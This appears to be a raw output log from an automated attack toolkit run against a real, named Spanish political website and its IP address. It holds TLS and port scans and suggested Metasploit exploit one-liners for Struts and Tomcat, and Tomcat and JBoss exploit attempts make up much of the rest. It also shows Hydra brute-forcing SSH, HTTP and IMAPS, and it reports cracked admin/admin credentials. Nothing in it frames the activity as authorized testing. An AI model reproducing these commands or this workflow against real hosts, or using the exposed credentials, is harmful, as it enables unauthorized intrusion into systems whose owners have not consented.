- Not After: Dec 31 06:11:20 2018 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['falange-autentica.es']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['falange-autentica.es', 'falange-autentica.es', "Let's Encrypt Authority X3"]
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 2.41 S
- ------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 91.121.2.184
- Testing SSL server falange-autentica.es on port 443 using SNI name falange-autentica.es
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits RC4-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits RC4-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits RC4-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: falange-autentica.es
- Altnames: DNS:falange-autentica.es
- Issuer: Let's Encrypt Authority X3
- Not valid before: Oct 2 06:11:20 2018 GMT
- Not valid after: Dec 31 06:11:20 2018 GMT
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://falange-autentica.es:8080
- http://falange-autentica.es:8080 [ Unassigned]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 91.121.2.184
- Testing SSL server falange-autentica.es on port 8080 using SNI name falange-autentica.es
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- ====================================================================================
- RUNNING APACHE STRUTS CVE-2017-5638 VULN SCAN
- ====================================================================================
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:38 EST
- ====================================================================================
- RUNNING APACHE STRUTS 2 REST PLUGIN XSTREAM RCE VULN CHECK
- ====================================================================================
- [*] If you see a 200 response code below, try running 'msfconsole -q -x "multi/http/struts2_rest_xstream; set RHOST "falange-autentica.es"; exploit -j; exit;
- RUNNING APACHE STRUTS JAKARTA RCE VULN CHECK
- ====================================================================================
- [*] If you see a 200 response code below, try running 'msfconsole -q -x "multi/http/struts2_content_type_ognl; set RHOST "falange-autentica.es"; exploit -j; exit;
- ====================================================================================
- RUNNING APACHE TOMCAT EXPLOITS
- ====================================================================================
- RHOSTS => falange-autentica.es
- RHOST => falange-autentica.es
- [-] WAR file not found
- [*] Auxiliary module execution completed
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- RPORT => 8080
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Attempting to connect to 91.121.2.184:8080
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] http://91.121.2.184:8080/admin/j_security_check - Checking j_security_check...
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- USERNAME => tomcat
- PASSWORD => tomcat
- [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://falange-autentica.es:8080 **
- [*] Checking admin-console:
- * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: /admin-console//github.com/joaomatosf/jexboss (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Struts2:
- * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Servlet Deserialization:
- * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Application Deserialization:
- * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Jenkins:
- * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking web-console: [ ERROR ]
- * The server http://falange-autentica.es:8080 is not an HTTP server.
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- #######################################################################################################################################
- I, [2018-11-07T17:38:52.807771 #18562] INFO -- : Initiating port scan
- I, [2018-11-07T17:39:41.499183 #18562] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-07_17-38-52.xml
- I, [2018-11-07T17:39:41.500279 #18562] INFO -- : Discovered open port: 91.121.2.184:80
- I, [2018-11-07T17:39:42.184442 #18562] INFO -- : Discovered open port: 91.121.2.184:443
- I, [2018-11-07T17:39:43.563216 #18562] INFO -- : Discovered open port: 91.121.2.184:465
- I, [2018-11-07T17:39:50.498987 #18562] INFO -- : Discovered open port: 91.121.2.184:993
- I, [2018-11-07T17:39:50.969259 #18562] INFO -- : Discovered open port: 91.121.2.184:60443
- I, [2018-11-07T17:39:52.467275 #18562] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
- | Plixer Scrutinizer NetFlow | http://91.121.2.184:80/cgi-bin/admin.cgi | ./auxiliary/admin/http/scrutinizer_add_user.rb | | |
- +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:42 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 17:42
- Completed NSE at 17:42, 0.00s elapsed
- Initiating NSE at 17:42
- Completed NSE at 17:42, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 17:42
- Completed Parallel DNS resolution of 1 host. at 17:43, 16.50s elapsed
- Initiating SYN Stealth Scan at 17:43
- Scanning falange-autentica.es (91.121.2.184) [474 ports]
- Discovered open port 993/tcp on 91.121.2.184
- Discovered open port 80/tcp on 91.121.2.184
- Discovered open port 443/tcp on 91.121.2.184
- Discovered open port 22/tcp on 91.121.2.184
- Discovered open port 8080/tcp on 91.121.2.184
- Discovered open port 465/tcp on 91.121.2.184
- Discovered open port 389/tcp on 91.121.2.184
- Discovered open port 7071/tcp on 91.121.2.184
- Completed SYN Stealth Scan at 17:43, 4.79s elapsed (474 total ports)
- Initiating Service scan at 17:43
- Scanning 8 services on falange-autentica.es (91.121.2.184)
- Completed Service scan at 17:43, 21.27s elapsed (8 services on 1 host)
- Initiating OS detection (try #1) against falange-autentica.es (91.121.2.184)
- Retrying OS detection (try #2) against falange-autentica.es (91.121.2.184)
- Initiating Traceroute at 17:43
- Completed Traceroute at 17:43, 0.12s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 17:43
- Completed Parallel DNS resolution of 2 hosts. at 17:43, 16.50s elapsed
- NSE: Script scanning 91.121.2.184.
- Initiating NSE at 17:43
- Completed NSE at 17:46, 181.15s elapsed
- Initiating NSE at 17:46
- Completed NSE at 17:46, 1.13s elapsed
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.11s latency).
- Not shown: 463 filtered ports
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
- |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
- 25/tcp closed smtp
- 80/tcp open http Apache httpd (PHP 5.6.14)
- |_http-favicon: Unknown favicon MD5: DCE399F4B8AE42FFF4346099CFD7C983
- |_http-generator: Joomla! - Open Source Content Management
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- | http-robots.txt: 15 disallowed entries
- | /joomla/administrator/ /administrator/ /bin/ /cache/
- | /cli/ /components/ /includes/ /installation/ /language/
- |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
- |_http-server-header: Apache
- |_http-title: Falange Aut\xC3\xA9ntica
- 139/tcp closed netbios-ssn
- 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
- | ssl-cert: Subject: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
- | Issuer: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
- | Public Key type: rsa
- | Public Key bits: 1024
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2013-12-09T09:57:56
- | Not valid after: 2018-12-08T09:57:56
- | MD5: 922f 71f8 2bf1 f953 ff2f 28d6 903f a524
- |_SHA-1: 5aa2 2e6f 9c8b 2556 b75c 87e0 f34a c1ce 2ee3 85a1
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- | http-methods:
- |_ Supported Methods: GET HEAD
- | http-robots.txt: 15 disallowed entries
- | /joomla/administrator/ /administrator/ /bin/ /cache/
- | /cli/ /components/ /includes/ /installation/ /language/
- |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
- |_http-server-header: Apache
- | ssl-cert: Subject: commonName=falange-autentica.es
- | Subject Alternative Name: DNS:falange-autentica.es
- | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-10-02T06:11:20
- | Not valid after: 2018-12-31T06:11:20
- | MD5: e93b 6570 be85 20b1 cccc 0345 2d30 5948
- |_SHA-1: 4b82 cef8 595e 0e57 3a35 68c8 6ce1 8df4 a0cf b877
- |_ssl-date: 2018-11-07T22:43:52+00:00; 0s from scanner time.
- 445/tcp closed microsoft-ds
- 465/tcp open ssl/smtps?
- |_smtp-commands: Couldn't establish connection on port 465
- |_ssl-date: TLS randomness does not represent time
- 993/tcp open ssl/imaps?
- |_ssl-date: TLS randomness does not represent time
- 7071/tcp open ssl/iwg1?
- |_ssl-date: 2018-11-07T22:43:48+00:00; 0s from scanner time.
- 8080/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
- |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
- Device type: general purpose|storage-misc|router|media device|WAP|broadband router
- Running (JUST GUESSING): Linux 2.6.X|3.X (94%), HP embedded (91%), MikroTik RouterOS 6.X (90%), Infomir embedded (90%), Ubiquiti embedded (90%), Ubiquiti AirOS 5.X (90%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/o:mikrotik:routeros:6.30 cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/h:ubnt:airmax_nanostation cpe:/o:ubnt:airos:5.5.9
- Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.32 - 3.1 (94%), Linux 2.6.32 - 3.13 (94%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.10 (92%), Linux 3.2 (92%), HP P2000 G3 NAS device (91%), Linux 3.5 (91%), Linux 3.8 (91%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 21.266 days (since Wed Oct 17 12:24:18 2018)
- Network Distance: 2 hops
- TCP Sequence Prediction: Difficulty=257 (Good luck!)
- IP ID Sequence Generation: All zeros
- TRACEROUTE (using port 445/tcp)
- HOP RTT ADDRESS
- 1 107.07 ms 10.251.200.1
- 2 106.90 ms 91.121.2.184
- NSE: Script Post-scanning.
- Initiating NSE at 17:46
- Completed NSE at 17:46, 0.00s elapsed
- Initiating NSE at 17:46
- Completed NSE at 17:46, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 247.58 seconds
- Raw packets sent: 1028 (49.416KB) | Rcvd: 3952 (2.351MB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:46 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 17:46
- Completed NSE at 17:46, 0.00s elapsed
- Initiating NSE at 17:46
- Completed NSE at 17:46, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 17:46
- Completed Parallel DNS resolution of 1 host. at 17:47, 16.50s elapsed
- Initiating UDP Scan at 17:47
- Scanning falange-autentica.es (91.121.2.184) [14 ports]
- Completed UDP Scan at 17:47, 2.83s elapsed (14 total ports)
- Initiating Service scan at 17:47
- Scanning 12 services on falange-autentica.es (91.121.2.184)
- Service scan Timing: About 8.33% done; ETC: 18:06 (0:17:58 remaining)
- Completed Service scan at 17:48, 102.58s elapsed (12 services on 1 host)
- Initiating OS detection (try #1) against falange-autentica.es (91.121.2.184)
- Retrying OS detection (try #2) against falange-autentica.es (91.121.2.184)
- Initiating Traceroute at 17:48
- Completed Traceroute at 17:49, 7.18s elapsed
- Initiating Parallel DNS resolution of 1 host. at 17:49
- Completed Parallel DNS resolution of 1 host. at 17:49, 16.50s elapsed
- NSE: Script scanning 91.121.2.184.
- Initiating NSE at 17:49
- Completed NSE at 17:49, 20.38s elapsed
- Initiating NSE at 17:49
- Completed NSE at 17:49, 1.03s elapsed
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using port 137/udp)
- HOP RTT ADDRESS
- 1 107.78 ms 10.251.200.1
- 2 ... 3
- 4 105.57 ms 10.251.200.1
- 5 108.54 ms 10.251.200.1
- 6 108.53 ms 10.251.200.1
- 7 108.52 ms 10.251.200.1
- 8 108.51 ms 10.251.200.1
- 9 108.50 ms 10.251.200.1
- 10 108.50 ms 10.251.200.1
- 11 ... 18
- 19 105.15 ms 10.251.200.1
- 20 102.11 ms 10.251.200.1
- 21 ... 28
- 29 106.62 ms 10.251.200.1
- 30 106.29 ms 10.251.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 17:49
- Completed NSE at 17:49, 0.00s elapsed
- Initiating NSE at 17:49
- Completed NSE at 17:49, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 171.03 seconds
- Raw packets sent: 135 (11.658KB) | Rcvd: 5025 (1.563MB)
- #######################################################################################################################################
- __________ __ ____ ___
- \______ \_______ __ ___/ |_ ____ \ \/ /
- | | _/\_ __ \ | \ __\/ __ \ \ /
- | | \ | | \/ | /| | \ ___/ / \
- |______ / |__| |____/ |__| \___ >___/\ \
- \/ \/ \_/
- + -- --=[BruteX v1.7 by 1N3
- + -- --=[http://crowdshield.com
- ################################### Running Port Scan #################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:49 EST
- Nmap scan report for falange-autentica.es (91.121.2.184)
- Host is up (0.11s latency).
- Not shown: 17 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- 389/tcp open ldap
- 443/tcp open https
- 993/tcp open imaps
- 8080/tcp open http-proxy
- Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds
- ################################### Running Brute Force ###############################################################################
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:00
- [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
- [DATA] attacking ssh://falange-autentica.es:22/
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:14
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking ssh://falange-autentica.es:22/
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:28
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://falange-autentica.es:80//
- [80][http-get] host: falange-autentica.es login: admin password: admin
- [STATUS] attack finished for falange-autentica.es (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:50:52
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
- + -- --=[Port 443 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:52
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://falange-autentica.es:443//
- [443][http-get] host: falange-autentica.es login: admin password: admin
- [STATUS] attack finished for falange-autentica.es (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:51:07
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:51:07
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking imaps://falange-autentica.es:993/993
- [STATUS] 131.00 tries/min, 131 tries in 00:01h, 1402 to do in 00:11h, 1 active
- [STATUS] 133.33 tries/min, 400 tries in 00:03h, 1133 to do in 00:09h, 1 active
- [STATUS] 133.29 tries/min, 933 tries in 00:07h, 600 to do in 00:05h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 18:02:37
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5901 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 18:02:37
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- ################################### Done! ###########################################
- * default
- * default
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 91.121.2.184
- [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-falange-autentica.es.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 91.121.2.184
- [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-falange-autentica.es-udp.xml
- [*] Importing 'Nmap XML' data
- [*] Import: Parsing with 'Nokogiri v1.8.5'
- [*] Importing host 91.121.2.184
- [*] Successfully imported /usr/share/sniper/loot/falange-autentica.es/nmap/nmap-udp-falange-autentica.es.xml
- Hosts
- =====
- address mac name os_name os_flavor os_sp purpose info comments
- ------- --- ---- ------- --------- ----- ------- ---- --------
- 91.121.2.184 Linux 2.6.X server
- 195.55.47.89 Windows 3.X device
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
- 91.121.2.184 25 tcp smtp closed
- 91.121.2.184 53 udp domain unknown
- 91.121.2.184 67 udp dhcps unknown
- 91.121.2.184 68 udp dhcpc unknown
- 91.121.2.184 69 udp tftp unknown
- 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
- 91.121.2.184 88 udp kerberos-sec unknown
- 91.121.2.184 123 udp ntp unknown
- 91.121.2.184 137 udp netbios-ns filtered
- 91.121.2.184 138 udp netbios-dgm filtered
- 91.121.2.184 139 tcp netbios-ssn closed
- 91.121.2.184 139 udp netbios-ssn unknown
- 91.121.2.184 161 udp snmp unknown
- 91.121.2.184 162 udp snmptrap unknown
- 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
- 91.121.2.184 389 udp ldap unknown
- 91.121.2.184 443 tcp ssl/ssl open Apache httpd SSL-only mode
- 91.121.2.184 445 tcp microsoft-ds closed
- 91.121.2.184 465 tcp ssl/smtps open
- 91.121.2.184 520 udp route unknown
- 91.121.2.184 993 tcp ssl/imaps open
- 91.121.2.184 2049 udp nfs unknown
- 91.121.2.184 7071 tcp ssl/iwg1 open
- 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
- 195.55.47.89 25 tcp smtp closed
- 195.55.47.89 53 udp domain unknown
- 195.55.47.89 67 udp dhcps unknown
- 195.55.47.89 68 udp dhcpc unknown
- 195.55.47.89 69 udp tftp unknown
- 195.55.47.89 80 tcp http-proxy open Squid http proxy
- 195.55.47.89 88 udp kerberos-sec unknown
- 195.55.47.89 113 tcp ident closed
- 195.55.47.89 123 udp ntp unknown
- 195.55.47.89 137 udp netbios-ns filtered
- 195.55.47.89 138 udp netbios-dgm filtered
- 195.55.47.89 139 tcp netbios-ssn closed
- 195.55.47.89 139 udp netbios-ssn unknown
- 195.55.47.89 161 udp snmp unknown
- 195.55.47.89 162 udp snmptrap unknown
- 195.55.47.89 389 udp ldap unknown
- 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
- 195.55.47.89 445 tcp microsoft-ds closed
- 195.55.47.89 520 udp route unknown
- 195.55.47.89 2049 udp nfs unknown
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:09 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- Not shown: 465 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- 389/tcp open ldap
- 443/tcp open https
- 465/tcp open smtps
- 993/tcp open imaps
- 7071/tcp open iwg1
- 8080/tcp open http-proxy
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:09 EST
